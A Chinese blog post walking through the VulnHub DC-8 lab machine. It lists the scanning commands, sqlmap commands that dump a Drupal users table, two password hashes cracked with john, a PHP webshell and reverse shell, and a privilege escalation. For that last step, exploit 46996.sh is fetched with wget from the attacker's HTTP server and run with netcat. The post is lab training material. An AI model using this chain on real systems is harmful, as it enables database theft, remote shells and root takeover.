vulnhub靶机:dc-8

最新推荐文章于 2024-08-29 20:58:07 发布
最新推荐文章于 2024-08-29 20:58:07 发布
阅读量372 收藏 4
点赞数 4
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waitagirl/article/details/136904166
版权

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机ip

10.9.23.74

2:端口扫描

nmap -A -p- -T4 10.9.23.74

3:端口探测

4: 目录遍历

dirb http://10.9.23.74

http://10.9.23.74/robots.txt

发现有登录界面地址,访问一下:

/?q=user/login/

发现可能存在sql注入

二:渗透测试

1:漏洞利用

试试sql注入:

sqlmap -u "http://10.9.23.74/?nid=1" --batch

发现可以注入,查看下数据库:

sqlmap -u "http://10.9.23.74/?nid=1" -dbs --batch

爆出d7db数据库的表:

sqlmap -u "http://10.9.23.74/?nid=1" -D d7db --tables --batch

发现users表,爆出usesr表的列:

sqlmap -u "http://10.9.23.74/?nid=1" -D d7db -T users --columns --batch

发现name和pass,查看字段:

sqlmap -u "http://10.9.23.74/?nid=1" -D d7db -T users -C name,pass --dump --batch

发现两个用户,将两个pass字段放入john中进行破解:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

用户

admin

john

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

曝出密码

turtle

2:登录系统尝试反弹shell

john用户登录成功

这个界面可以写入php代码,添加一句话木马

成功反弹

三:提权

升级shell

python -c 'import pty;pty.spawn("/bin/bash")';

查看是否有特殊执行的文件

find / -perm -u=s -type f 2>/dev/null

查看exim4的版本:

/usr/sbin/exim4 --version

查找exim4的漏洞:

发现和dc4提权的步骤一样

存在本地提权

发现46996.sh脚本可以提权,将其发送到DC-8中

开启80端口

python3 -m http.server 80

wget http://10.9.23.112/46996.sh

文件结束符有错误,将其替换并进行提权:

sed -i -e 's/\r$//' 46996.sh

./46996.sh -m netcat

靶机结束

不言君
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3003
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2486
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4136
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1463
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 760
Vulnhub靶机:DC-1渗透详细过程
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 883
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 368
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机实战DC-3
Varin
06-04 962
vulnhub靶机实战DC-3
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 324
DC-1详解
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1602
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3638
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
企业级环境部署:在 Linux 服务器上如何搭建和部署 Python 环境?
sdgfafg_25的博客
08-29 404
在大部分企业里,自动化测试框架落地都肯定会集成到Jenkins服务器上做持续集成测试,自动构建以及发送结果到邮箱,实现真正的无人值守测试。不过Jenkins搭建一般都会部署在公司的服务器上,不会在私人电脑里,而服务器大部分都是Linux操作系统的。所以,我们如果要在Linux上的Jenkins服务器里运行python自动化的脚本,那么就在linux服务器上把python以及相关用到的第三方库的环境都安装部署好。我们今天就给大家详细介绍一下Linux里如何安装和部署Python的环境。
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 384
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
虚拟内存和linux(操作系统八股文part1)
linjixia的博客
08-24 1317
八股之虚拟内存和Linux部分的笔记。
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
最新发布
AsherGu的博客
08-29 380
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
linux 系统性能调优技巧
m0_50641264的博客
08-27 276
【代码】linux 系统性能调优技巧。
Linux——进程管理
m0_67677309的博客
08-29 276
1、通过fork创建的子进程会拷贝父进程(数据段、bss段、堆、栈、I/O缓冲区),与父进程共享代码段、子进程会继承父进程的信号处理方式。ITIMER_VIRTUAL 虚拟计时器 用户态的计时SIGVTALRM(26)**使用的时候要对应。ITIMER_REAL 真实计时器 程序总的计时时间SIGALRM(14)void (*sa_restorer)(void);// 第一次产生时钟信号的时间 **3秒钟一次,每个两秒。
linux 中如何将.c 文件转换为可执行文件
千千道的博客
08-29 819
Linux 环境下进行 C 语言编程时,将.c文件转换为可执行文件是一个关键的步骤。这个过程涉及到使用编译器和一些相关的工具,本文将详细介绍在 Linux 系统中如何将.c文件转换为可执行文件的方法。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值